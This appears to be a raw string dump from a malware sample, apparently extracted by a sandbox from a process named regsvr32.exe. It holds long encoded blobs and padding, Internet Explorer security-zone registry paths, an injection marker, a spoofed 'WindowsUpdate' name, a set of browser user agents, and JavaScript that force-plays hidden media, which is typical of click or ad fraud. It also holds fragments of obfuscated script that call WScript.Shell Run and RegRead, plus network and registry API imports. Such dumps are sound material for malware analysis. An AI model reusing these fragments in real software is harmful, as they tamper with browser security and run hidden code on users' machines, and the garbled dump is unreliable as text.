lTJiEoYmGGlAl88KHUZuTXFpYT1Z4pXwrnkI1DVL0FGs5NdOGyeAKbo9Xs8aaxYTujku558nD2FwnA8IbBi/67WT7RAWsSKtkL7lwOLlXQvtYpwBTQWZGFtkrPjcl90DK3mSP7oPWaH9BX4iKhz22JFaLEdNiv Czh4Jqttes3oX5OJRCdws0qp2Use97 oZKC0dHxN c2O3ESpZEBDbH0bVRUzaGsrIxNiMCa/5tsuAQ0LNTWXOP OsgpRnhkJCRZmPVSrBRVpZcKv7kkxzJjw551n71u2Y66AqpnTGKkOLL6FaRYDOjKEFvzerH4etYGKb/jjwmddy UzY4Z7ws6AhGJNW1kcn A5ytg4s7ePRSHrJ0HK1sIw/E1cefkAxp0RryFmuzjMFBFOvc09 QIrPWZAEycm56xakGU9qcxMbjK9xH2rsR9wF6Qjv6LH6FNU4PsUPsJUE5D3GHahvJZd8MDR7I fIgJ8Y6i8R7Iw4cTZzdcp3rH/gGylGwtuYK zpQFPnJs6TxJVhgwDVeibDGT cmuqdt9nGnKay8OB1/ mDjsWs47ndexRZydsatmD05dCuRDDzbKRKYD16WR4DvdPOYNy7OXo990c1pmWCrBs/pF6fd6 KBui54jz6ufiSsN1ZbqIXzMCGlhd0PkM4FgyGrQaE6b gMMDLeoDBR4qIWoBVY/Ozl2Vzd5Zi4dZ6hjc28f8F/1KoyfS4V NtDR0uEcsuU6I2q1naokDAFPfiFV YRhBVNZiYzVCnqBV2kyWO/paeIb7H/2ZKIvSDkVTWaNvbE0089Q59Kj5R byL6Y9H1ciLdE38IKeWjQa9fPSRlJyvpQMS0AbX4RPvo2tIhk3Lm5c17JUOK3OGbShzt8YHIrt/9a4slvfxs7os3bg6jJax97rJqVRUFuWJ20ML1 K0yeV2wMayqZrFghV/2ycUtga7fgZVih20wz90ev4EMxyWnR/I zdEDL1PwKvjn2ReeUtzL OFyzn8cVqSQTjMD08oAmH0UNEFQlfwkkwM9X4YMrPqryUOc1RaYxgQ7z0YrY/kGk lic5r E1Ffkn9Ft5xT89i860r3D0M5BlnRdFcTZETH18mUVAnVoZLvbxWRTqDWgwr42Z XVj khzcfvUisqAPQfOiM77oUXcOxiRyfHcmmirIvBpL3zt LpmLZrGE81V5uTgklyT/PpQVbokkPIhThIqvbuDH1x77tz8qVgq62kuCcQQ8C9 pZfvUhaE7k5ZrK7SpO0CI8XSCcRBz3AFeFiQm1 iMbaL1nyAgL/xF76iP9FxTUJmXwYCWaauG  MrhELjoIDyUOztQ/Ws8 vXqYvX98cJyozEweWuTUNc7q5 p0 ESCmgrhIL/30f2rmzMrFDQAASJ4qk2YFkv1drFC /sAt7uxYhRW92OoqlHLFxH/sIqbzDQKHPGSMeulQKMHkPcOtgoqXWfQkrqIN2bDYhepdM2hO4ZH5Eoe/N/l8FYKN7KkWD2Tvx9d8byLNtQdA3c0oqzomgHkJA6sIJHtpi2LaBJ8HP7Un3guca1i9QMf6F4ynOMKYWyhxrm/82Hj/oiz/3liv/nqFiT P7eMhERpSgfS7uS/z3BECYrVJ3hnZDLpHLO15vz51DxfMRxpcbMAqeuOPaRZik73V6xXAzAFigj 1/ncX/9Bh9nFc9tSOx6em4K3 TxyoJrceU3l5JHTHMi6F l94mKNms876z9Dw041eivZ4AhUc6L0ViVB1ADIvxpMLy3T2/6Nb/sd1JWUUClB4ZZnt5ci4V/fk8h1pu7yJS9GsDfLUeCFv6uaPeUejmkwr2c b9IANOzgTOthCq/h2D4y5VlT8G1DpCeW0Qa33UYDCNwGlNHR/FWlX brwy3/tuc7ZfyO2PHKhRqFZeoTKkTXDuRqWsn4N8PqcD6 eNfscByikOu4z8 ey6LTQTUs0cst/gsbKTMdL6kfU5ORnXvpIYMJ/rDjEsMFZUUPa/dEZTfjccu46nMwLeFv/1Sy8tGQ0dgg0nGO/vDFgbWr7wu0seEjMN1xUFWgi7tq7CyRyLlhoLQvEq1j EMrtOI5hewB/mRZt06vQf77g9thV5EfCoWndVJAG11w0c23VSRQN2PTF5PKzLoxFxw 7sIVb viYqIRAipaM9QxtsNp9cSZ2qgPz5Xj3gRUaWXNv3tSwJDrGh5D2LBwfHK8frl7HcjmHFsfyrm0veNQFbgdw2ZIHazOO4ViboztG2jfL0tBwGppzj4sKFOBfyuz4w3RSFA3rCg4v4U3OeHcrXPxU1aYEloC2l9XAfl0lGQ0Jw8XlrNg2EWRcQd3OWWtEgrgWNo9gj8qVdIjVBEjQMvEXX8vjc/rC1gnnSExia2Y1cYA5kiQXIh8Saq2VED/JYoGSFcMr/XW1uynACuIH1Wm91idx8Ef04zh3XfdPkOcis7grQBfMImJiRH4xZ eO4ob6t530/KfIqg4SsXq 2D8ZmqGlmqqDXJt2S3BJ8aB8UEbOPglsRxPqYmjTropdtatNLos3H4KZAXXkYoxColKlcYHomawGrnYtHVOSDneHPEZtZOQoMygjQZDcoYJyGNpR2Qu8O7hpZW hGBnYksL0ufm6lWBGxrXGKPFGvhyIxOQTglytxFMZXun1HG28HLol8i jKH6F bsjbEaKA j2jSoTEm6btw0YhQHDq99miSNcI7JZggdLne4fhlI9Ctx98/pNSiTm6 CkMkCZM8lslDn3EnBO5BHyqeIi4BH3cUxTiP7 GUHPY9sk12DiAPXbxwfrA8ZgmNpt4jNa1NNtBmQXyJS0Q75tyJWLmFYKlglvUvEFuSep6bRmdDzgFFYQp7dKOtkBYlDQJkDX/enOXvw1kZRBCha6lsKWGahfwB/naILsjBPvwyYWjOhz9r7C jXuKp4a/aUKSsSR1oxQUAdFOyEev72353m3gGFEO9DCrpP2Nb4yT5rcFqu/70fFNvYrWXlaQQthYOAme  hxa0XUObi/NkSC1Q2PKMIcd4iUWqyjYI8k1VEXBaRNWfDu5zge2wGs5RpoXItVVVcc9Tdhf/kpAO/sDMCifGexXijM98l3PfCc374P8xIOJNAN2Zw4uY7CcsBhdI7Q2SoH9OeBrt/Wtz678mj0riAQcmbLWhFirT1nPAAWID6TCqc780BMIamCWei8phZsWuBeaAFe5arKa78IJX6qhOxV/I8RaE/ZQSRo72nxwXeHogMe9u49s8SUHlTDcfFqD6ZK/Bf9mrm9kqNZ6V0vwR9RTCTp3zIaOqOUWlf384AqE sgCgb9iCSJqF0z/P959UQMwzXAv359FKElIL8mboFK5LGOuOfgwzgNeuy8fLwmvYOMRSJ1rZSOd1X5EhO5JNncoGR7noLGk2wF/J28K/AHd3Pinn7QYCO9qbbjEdeQqzb9L3Wgui13frEV8iF7QuMgmPUJL8cuarMGgCjA1U6asICK3agxVTWFrPGDos1JiNGOHmvGZcJd3D/OzTAWVPOhFrNzImt NkHeYvzMW 2cZR1V9XunTIpbz/pIDhYfwF/2Yi2x6uAVkfderH0ynXLQiJ u5bV9ENvCX2VpCoZ y9dp//ejqqCqybHfmQp/6fRbSn lNab7wsZbRAJeePIkSamofgjeW8xaGbu5ZpUwd/k0 uTKRNPESqiAZYmPd2RU2YLUyqCCEMkZmJ75gBxnzFK7GKgQlZU9XxC24fnPp6P19g6qhEEt2qkX0Oe6fNCNWfMO7NJE2dfZ25/q1mJPqjXThahO5L5iEzxA8es68rYDlmwWg0M0Gk0 mv4UaTRDoodSnCcpIDoDjYFC3aV1T7aTleoulDVEEyG3GxfCJsKHLa1X9 OIWYoWj1ArTpZJBE6IM6j5mJkcKmLLOkgrOrC309HqgcgK3e 9 3QJTZU4d VUTOCwoP MXuTukSSrsPXQqjdzb53WbWvl5jyRzdvnDVS9NzLlE5Z124JPXMHexvxWSGT8AhV4vW5QgpptPa8cFeWEKgk97fZMfBw67azErFcI/MUddVNCdw0Ou0Rg8FKTr6xdFYbbcvz/vDlZiCivyMMiO8pqmUvNbhvNsvQxaoBdy JSvkZVpHdnuKynqdpk0WQVZWOe61L2gujDC7TqvQoVbkAYchdRj7kPSTJIO2VD/LFNOFqbqErHSeChexIsip3WnFOKmSU P9pAoqiJLEbeFcKVlf07Yofh7YL AVmm/98v1b80TpVa8FGWpAMNYR64q6CtJcNZtl1W3UKTg96SNgIRNWiAl0A58z6WJ/z2w6OjZ11LzW42S1CUGB9fDa5Y4GAR7h540Ar0bCcUpB5uDke4j0UM/ K EiFayNrGODZ5Fq8ELzd4ULA3dyVAIjATjlkWWeviHV1TId4HKX2m0Hp7Kt4VEi8Ho iFqXqr2k78zm0ot6cUGzgQhejjtD0T09MLSXrq2TeQES7sYuL7cCh19QYnaAAE2WKStO1GZSX0GIuR5f89Jopioia9cWra7JgaUSxMVoCVV4ZgdeD0Z8awr4eAFLXykq0ZIA74fGw23ksGG23BgHse2Je7giklzfkX4lom  75p4DSLQ4iaXoVVfJRLhFWDtEZLRjcIs6ic4vMFyWDtTLUvrRUu0drG0g7JS0Wvt4C9j64ZdNtBHBH3NBrR8BDMr/xNopTTCrgan5nUHmKfM/9 44mydjXU 5DLj6Yof1fdwCt7fJHICfmkZmDYDypf0Jx GDQWVhlmcjH7TiE65ScvxU6q cXSQSPb4 YyGImz/0QvYpQUyo1Q6H0oClSVMoFtVGvyXkSIm/zK8WLUw5Wjq1svMZP0v4I5VsrscNoNhPhu1st5p2UbPOirYjsdN6/CmZgvPL1oZz3Uc4nVHclToDm3tGULLDPyi7BhT9Z7mAyF/4rxZ5PbGJsdjCRb Sdf4iouWu1BWga14VyWaATnVM/eDni6lMNHdKx/mzjHz26YiqNQ8EMIyHm64fSN8MpEuDK9AV1I5vzt2Sr7q594DRt6LeJEczAdahziQqzXuQEJCXQiRt9ykAK0IgScih8IKR15PsyrUNN KWBpz7KNRpRUcjH84MKOo5Bc mszoLo/mcbbx00Uk4oP4WueHMR3iQOUHV01zjEAaOlwiEgbQyeW9h7pC43BHugPTwIMUpWEAxcPzdqV96nnZof2ckXniIurMEszerxKZQvhf0rjHCwsADh1/YqZOcu2Is vVsmZDqbID/LPNMHv49ePaEP1t3yd0uHdqlO3NnGFAXPpqMK7V4w1V6a PsaEchOac8I/S JLWKNn9CroMhyWiXMpK3RpnEH1F2gq3IjD5A7x/hLRzjXsnnlRx7x/3A0FpxYtaUCJabufXxuviuEf1DOtUTWc9Wr2UrNBYM7DFNSLCxHZcJia1lgd5C1edP/kieQhkc NJYm19rrk VmoDhQ5o VKFEfpfbODG m 9hiG3XGrLTFOyD2poOudhV2MXnSRut/jCc/RVxkKj8mzhTi1 IOoQHopYwbdrbMtN0aqrN1gp6HWaNm4pfWzfKrobU4qX6UQm2ceiTzaC8VNQoEX6Y4ACHu7gBvSf6/Xh cNXKIGydZ3TSUlQt1NuCd8PLe5535THWB2smI Lb nxKYgRi/tpxiNp6cvbvyQLpHqwPI6oGNFczLcWffb8gaJHRYuzx47AWT DSmy8VwHr4PZJzgdP0AKXVtsPJGyggPWLA/0wUS6WG2TmQHSXcgKlpr7Uf8CDBY0CiteleSNh3ZE0CuY wOFuQpw0hW4w34yypzZVsx9y5i0teholLN9B4KU3KtGtT21M xDvlH5oapAVgyX6v4zpzLoxpPSXZYf GQtlyokLrmhEDg0kWvwKZAPOpbl 2T8G2Ae9o3p1y/lAL/Z6LbUVCeMVJQXr5Hpqwu IrKzZRz1V/ Oer1z0HbaTZmLPi1zQaPCDVPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
UhwEB
Uhû
Uh'%C
Uh,
Uh1%D
Ri8aXf8RMS9kwfLTePGA5cuunQIGdwDTg8lIk/aZfb4sEEVIQPLYbEXRLF0omAUxRTG Q9FiJ3iyff6qj4Gkkv9KX3N4Kot06WGnxXEch6JUbLjZ45/YS2dzdkUCIxvHdarUDHHI3JMMqO7K7IBd01EpbB0PxbC61Td78MNiPzB/jZF6rqs4zDkZGanDTyBM52sPH8XYqbKPlXjlHL6Kw5EGq voGi4L8MDWckJ1VqrTHGFwQ4PBUl8l4HkJUoCFCjkoFryvMUUvx1oqSn3Q9/ON22eEEnrro3n32sIelEIWE 1vmKGuDcaLtKkLDsmzy lINg9/yvNr94D7VIUk8fqg5 Mw0GB8h33z yJ3scmf0ZRdHqXPSwkmODEwxPFFgRxKXR TvpDX4Knb7UjKOL5scgBEg1QVHi5QZ6BsE68J3A1LrJEzFMuI8wMNoHwEbvvW/FJGqkpegyHDt trwOd2IItS5EnuHI2d/uzQh5VHnBSk4JSTmE0u6xOjsFhutAT WmdoZXJYPll4Bh4H6ucjO AYjAViCZirXzcqmB l537VJM3zXLBGQfTTbOXB3PsSCYQ8W7MZSmZZkSCrm9SQmoYOG8Crds37EqviX UdKDkOXHUVvNkJfS6mUUVVvgwADFwOqPY K8 rp jg3LOIIfFjKAm6nW6xaETjRGPjPh522JndLpuBUZtjFRDsJ8lZSb5AN0MSFql oCchNTpo462Bqr84mG/jPhbz31a6OWiVs3GxLQZWUZEaqeI8FHrQMyfqBBJcHw47obOrkzdjyznzRXUSE rpEswADU9bDqGaiQwnfeazZAVGNXCSlnJqnv2QcGkhBNLPtDm1YhZJU4TzIUHmGRKdjvCKWCwCtq9d63MyCG17et0oR5g8 vFtX7jDL02EB/G9O59jFieuGpzJE3WBRHUOQqCEMEk0UCP/Lxr5RGPNrDNXHduPbrmof660edbyazSZtjjA/fbiCplKhzitPQZRzWCktoKKc7pcc2mvFcjT3tUVbSYfC75 O1G5Zg42AN9GAPyRhn5rk9rIvCjruUHEi4dY4kAtqWdOcjHL5fqpfajiyO/RXfgrC0AfhoiGemP2JnB960j9oagiSfZ3VxHhJLj37GppNYL1/89ueXoh5Vy8 lTJiEoYmGGlAl88KHUZuTXFpYT1Z4pXwrnkI1DVL0FGs5NdOGyeAKbo9Xs8aaxYTujku558nD2FwnA8IbBi/67WT7RAWsSKtkL7lwOLlXQvtYpwBTQWZGFtkrPjcl90DK3mSP7oPWaH9BX4iKhz22JFaLEdNiv Czh4Jqttes3oX5OJRCdws0qp2Use97 oZKC0dHxN c2O3ESpZEBDbH0bVRUzaGsrIxNiMCa/5tsuAQ0LNTWXOP OsgpRnhkJCRZmPVSrBRVpZcKv7kkxzJjw551n71u2Y66AqpnTGKkOLL6FaRYDOjKEFvzerH4etYGKb/jjwmddy UzY4Z7ws6AhGJNW1kcn A5ytg4s7ePRSHrJ0HK1sIw/E1cefkAxp0RryFmuzjMFBFOvc09 QIrPWZAEycm56xakGU9qcxMbjK9xH2rsR9wF6Qjv6LH6FNU4PsUPsJUE5D3GHahvJZd8MDR7I fIgJ8Y6i8R7Iw4cTZzdcp3rH/gGylGwtuYK zpQFPnJs6TxJVhgwDVeibDGT cmuqdt9nGnKay8OB1/ mDjsWs47ndexRZydsatmD05dCuRDDzbKRKYD16WR4DvdPOYNy7OXo990c1pmWCrBs/pF6fd6 KBui54jz6ufiSsN1ZbqIXzMCGlhd0PkM4FgyGrQaE6b gMMDLeoDBR4qIWoBVY/Ozl2Vzd5Zi4dZ6hjc28f8F/1KoyfS4V NtDR0uEcsuU6I2q1naokDAFPfiFV YRhBVNZiYzVCnqBV2kyWO/paeIb7H/2ZKIvSDkVTWaNvbE0089Q59Kj5R byL6Y9H1ciLdE38IKeWjQa9fPSRlJyvpQMS0AbX4RPvo2tIhk3Lm5c17JUOK3OGbShzt8YHIrt/9a4slvfxs7os3bg6jJax97rJqVRUFuWJ20ML1 K0yeV2wMayqZrFghV/2ycUtga7fgZVih20wz90ev4EMxyWnR/I zdEDL1PwKvjn2ReeUtzL OFyzn8cVqSQTjMD08oAmH0UNEFQlfwkkwM9X4YMrPqryUOc1RaYxgQ7z0YrY/kGk lic5r E1Ffkn9Ft5xT89i860r3D0M5BlnRdFcTZETH18mUVAnVoZLvbxWRTqDWgwr42Z XVj khzcfvUisqAPQfOiM77oUXcOxiRyfHcmmirIvBpL3zt LpmLZrGE81V5uTgklyT/PpQVbokkPIhThIqvbuDH1x77tz8qVgq62kuCcQQ8C9 pZfvUhaE7k5ZrK7SpO0CI8XSCcRBz3AFeFiQm1 iMbaL1nyAgL/xF76iP9FxTUJmXwYCWaauG  MrhELjoIDyUOztQ/Ws8 vXqYvX98cJyozEweWuTUNc7q5 p0 ESCmgrhIL/30f2rmzMrFDQAASJ4qk2YFkv1drFC /sAt7uxYhRW92OoqlHLFxH/sIqbzDQKHPGSMeulQKMHkPcOtgoqXWfQkrqIN2bDYhepdM2hO4ZH5Eoe/N/l8FYKN7KkWD2Tvx9d8byLNtQdA3c0oqzomgHkJA6sIJHtpi2LaBJ8HP7Un3guca1i9QMf6F4ynOMKYWyhxrm/82Hj/oiz/3liv/nqFiT P7eMhERpSgfS7uS/z3BECYrVJ3hnZDLpHLO15vz51DxfMRxpcbMAqeuOPaRZik73V6xXAzAFigj 1/ncX/9Bh9nFc9tSOx6em4K3 TxyoJrceU3l5JHTHMi6F l94mKNms876z9Dw041eivZ4AhUc6L0ViVB1ADIvxpMLy3T2/6Nb/sd1JWUUClB4ZZnt5ci4V/fk8h1pu7yJS9GsDfLUeCFv6uaPeUejmkwr2c b9IANOzgTOthCq/h2D4y5VlT8G1DpCeW0Qa33UYDCNwGlNHR/FWlX brwy3/tuc7ZfyO2PHKhRqFZeoTKkTXDuRqWsn4N8PqcD6 eNfscByikOu4z8 ey6LTQTUs0cst/gsbKTMdL6kfU5ORnXvpIYMJ/rDjEsMFZUUPa/dEZTfjccu46nMwLeFv/1Sy8tGQ0dgg0nGO/vDFgbWr7wu0seEjMN1xUFWgi7tq7CyRyLlhoLQvEq1j EMrtOI5hewB/mRZt06vQf77g9thV5EfCoWndVJAG11w0c23VSRQN2PTF5PKzLoxFxw 7sIVb viYqIRAipaM9QxtsNp9cSZ2qgPz5Xj3gRUaWXNv3tSwJDrGh5D2LBwfHK8frl7HcjmHFsfyrm0veNQFbgdw2ZIHazOO4ViboztG2jfL0tBwGppzj4sKFOBfyuz4w3RSFA3rCg4v4U3OeHcrXPxU1aYEloC2l9XAfl0lGQ0Jw8XlrNg2EWRcQd3OWWtEgrgWNo9gj8qVdIjVBEjQMvEXX8vjc/rC1gnnSExia2Y1cYA5kiQXIh8Saq2VED/JYoGSFcMr/XW1uynACuIH1Wm91idx8Ef04zh3XfdPkOcis7grQBfMImJiRH4xZ eO4ob6t530/KfIqg4SsXq 2D8ZmqGlmqqDXJt2S3BJ8aB8UEbOPglsRxPqYmjTropdtatNLos3H4KZAXXkYoxColKlcYHomawGrnYtHVOSDneHPEZtZOQoMygjQZDcoYJyGNpR2Qu8O7hpZW hGBnYksL0ufm6lWBGxrXGKPFGvhyIxOQTglytxFMZXun1HG28HLol8i jKH6F bsjbEaKA j2jSoTEm6btw0YhQHDq99miSNcI7JZggdLne4fhlI9Ctx98/pNSiTm6 CkMkCZM8lslDn3EnBO5BHyqeIi4BH3cUxTiP7 GUHPY9sk12DiAPXbxwfrA8ZgmNpt4jNa1NNtBmQXyJS0Q75tyJWLmFYKlglvUvEFuSep6bRmdDzgFFYQp7dKOtkBYlDQJkDX/enOXvw1kZRBCha6lsKWGahfwB/naILsjBPvwyYWjOhz9r7C jXuKp4a/aUKSsSR1oxQUAdFOyEev72353m3gGFEO9DCrpP2Nb4yT5rcFqu/70fFNvYrWXlaQQthYOAme  hxa0XUObi/NkSC1Q2PKMIcd4iUWqyjYI8k1VEXBaRNWfDu5zge2wGs5RpoXItVVVcc9Tdhf/kpAO/sDMCifGexXijM98l3PfCc374P8xIOJNAN2Zw4uY7CcsBhdI7Q2SoH9OeBrt/Wtz678mj0riAQcmbLWhFirT1nPAAWID6TCqc780BMIamCWei8phZsWuBeaAFe5arKa78IJX6qhOxV/I8RaE/ZQSRo72nxwXeHogMe9u49s8SUHlTDcfFqD6ZK/Bf9mrm9kqNZ6V0vwR9RTCTp3zIaOqOUWlf384AqE sgCgb9iCSJqF0z/P959UQMwzXAv359FKElIL8mboFK5LGOuOfgwzgNeuy8fLwmvYOMRSJ1rZSOd1X5EhO5JNncoGR7noLGk2wF/J28K/AHd3Pinn7QYCO9qbbjEdeQqzb9L3Wgui13frEV8iF7QuMgmPUJL8cuarMGgCjA1U6asICK3agxVTWFrPGDos1JiNGOHmvGZcJd3D/OzTAWVPOhFrNzImt NkHeYvzMW 2cZR1V9XunTIpbz/pIDhYfwF/2Yi2x6uAVkfderH0ynXLQiJ u5bV9ENvCX2VpCoZ y9dp//ejqqCqybHfmQp/6fRbSn lNab7wsZbRAJeePIkSamofgjeW8xaGbu5ZpUwd/k0 uTKRNPESqiAZYmPd2RU2YLUyqCCEMkZmJ75gBxnzFK7GKgQlZU9XxC24fnPp6P19g6qhEEt2qkX0Oe6fNCNWfMO7NJE2dfZ25/q1mJPqjXThahO5L5iEzxA8es68rYDlmwWg0M0Gk0 mv4UaTRDoodSnCcpIDoDjYFC3aV1T7aTleoulDVEEyG3GxfCJsKHLa1X9 OIWYoWj1ArTpZJBE6IM6j5mJkcKmLLOkgrOrC309HqgcgK3e 9 3QJTZU4d VUTOCwoP MXuTukSSrsPXQqjdzb53WbWvl5jyRzdvnDVS9NzLlE5Z124JPXMHexvxWSGT8AhV4vW5QgpptPa8cFeWEKgk97fZMfBw67azErFcI/MUddVNCdw0Ou0Rg8FKTr6xdFYbbcvz/vDlZiCivyMMiO8pqmUvNbhvNsvQxaoBdy JSvkZVpHdnuKynqdpk0WQVZWOe61L2gujDC7TqvQoVbkAYchdRj7kPSTJIO2VD/LFNOFqbqErHSeChexIsip3WnFOKmSU P9pAoqiJLEbeFcKVlf07Yofh7YL AVmm/98v1b80TpVa8FGWpAMNYR64q6CtJcNZtl1W3UKTg96SNgIRNWiAl0A58z6WJ/z2w6OjZ11LzW42S1CUGB9fDa5Y4GAR7h540Ar0bCcUpB5uDke4j0UM/ K EiFayNrGODZ5Fq8ELzd4ULA3dyVAIjATjlkWWeviHV1TId4HKX2m0Hp7Kt4VEi8Ho iFqXqr2k78zm0ot6cUGzgQhejjtD0T09MLSXrq2TeQES7sYuL7cCh19QYnaAAE2WKStO1GZSX0GIuR5f89Jopioia9cWra7JgaUSxMVoCVV4ZgdeD0Z8awr4eAFLXykq0ZIA74fGw23ksGG23BgHse2Je7giklzfkX4lom  75p4DSLQ4iaXoVVfJRLhFWDtEZLRjcIs6ic4vMFyWDtTLUvrRUu0drG0g7JS0Wvt4C9j64ZdNtBHBH3NBrR8BDMr/xNopTTCrgan5nUHmKfM/9 44mydjXU 5DLj6Yof1fdwCt7fJHICfmkZmDYDypf0Jx GDQWVhlmcjH7TiE65ScvxU6q cXSQSPb4 YyGImz/0QvYpQUyo1Q6H0oClSVMoFtVGvyXkSIm/zK8WLUw5Wjq1svMZP0v4I5VsrscNoNhPhu1st5p2UbPOirYjsdN6/CmZgvPL1oZz3Uc4nVHclToDm3tGULLDPyi7BhT9Z7mAyF/4rxZ5PbGJsdjCRb Sdf4iouWu1BWga14VyWaATnVM/eDni6lMNHdKx/mzjHz26YiqNQ8EMIyHm64fSN8MpEuDK9AV1I5vzt2Sr7q594DRt6LeJEczAdahziQqzXuQEJCXQiRt9ykAK0IgScih8IKR15PsyrUNN KWBpz7KNRpRUcjH84MKOo5Bc mszoLo/mcbbx00Uk4oP4WueHMR3iQOUHV01zjEAaOlwiEgbQyeW9h7pC43BHugPTwIMUpWEAxcPzdqV96nnZof2ckXniIurMEszerxKZQvhf0rjHCwsADh1/YqZOcu2Is vVsmZDqbID/LPNMHv49ePaEP1t3yd0uHdqlO3NnGFAXPpqMK7V4w1V6a PsaEchOac8I/S JLWKNn9CroMhyWiXMpK3RpnEH1F2gq3IjD5A7x/hLRzjXsnnlRx7x/3A0FpxYtaUCJabufXxuviuEf1DOtUTWc9Wr2UrNBYM7DFNSLCxHZcJia1lgd5C1edP/kieQhkc NJYm19rrk VmoDhQ5o VKFEfpfbODG m 9hiG3XGrLTFOyD2poOudhV2MXnSRut/jCc/RVxkKj8mzhTi1 IOoQHopYwbdrbMtN0aqrN1gp6HWaNm4pfWzfKrobU4qX6UQm2ceiTzaC8VNQoEX6Y4ACHu7gBvSf6/Xh cNXKIGydZ3TSUlQt1NuCd8PLe5535THWB2smI Lb nxKYgRi/tpxiNp6cvbvyQLpHqwPI6oGNFczLcWffb8gaJHRYuzx47AWT DSmy8VwHr4PZJzgdP0AKXVtsPJGyggPWLA/0wUS6WG2TmQHSXcgKlpr7Uf8CDBY0CiteleSNh3ZE0CuY wOFuQpw0hW4w34yypzZVsx9y5i0teholLN9B4KU3KtGtT21M xDvlH5oapAVgyX6v4zpzLoxpPSXZYf GQtlyokLrmhEDg0kWvwKZAPOpbl 2T8G2Ae9o3p1y/lAL/Z6LbUVCeMVJQXr5Hpqwu IrKzZRz1V/ Oer1z0HbaTZmLPi1zQaPCDVPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADc
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
c:\%original file name%.exe path<<c:\%original file name%.exe>>path inj_ffile<<:2:>>inj_ffile

regsvr32.exe_928:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
user32.dll
ntdll.dll
Kernel32.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowserApp
IWebBrowser2
.length;
 =String.fromCharCode(parseInt(
.substr(
,2),16));
 =String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
psapi.dll
HTTP/1.1
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
Mozilla
?456789:;<=
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
@.reloc
222.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyA
version.dll
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
HttpSendRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
